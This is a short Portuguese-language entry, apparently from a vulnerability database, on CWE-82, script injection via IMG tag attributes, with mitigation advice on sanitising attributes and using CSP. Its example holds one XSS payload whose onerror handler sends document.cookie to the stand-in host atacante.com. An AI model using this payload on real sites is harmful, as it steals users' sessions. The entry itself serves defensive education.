Weaknesses of type CWE-82
7 resultsInjeção de script em atributos de tags IMG
A aplicação web falha em sanitizar ou valida inadequadamente dados que entram em atributos de tags IMG (como src, onerror, onload), permitindo que um atacante injete código JavaScript. O navegador executa esse código no contexto da página, roubando sessões, cookies ou realizando ações em nome do usuário.
Um formulário que salva comentários com imagens permite: <img src="x" onerror="fetch('https://atacante.com/steal?cookie=' + document.cookie)">. Quando outro usuário visualiza o comentário, o script rouba seu cookie de autenticação.
Sanitize todos os atributos de tags IMG removendo event handlers (onerror, onload, etc.) e valide/escape URLs no atributo src antes de renderizar. Use Content Security Policy (CSP) para bloquear execução de scripts inline e validação server-side rigorosa em dados de entrada.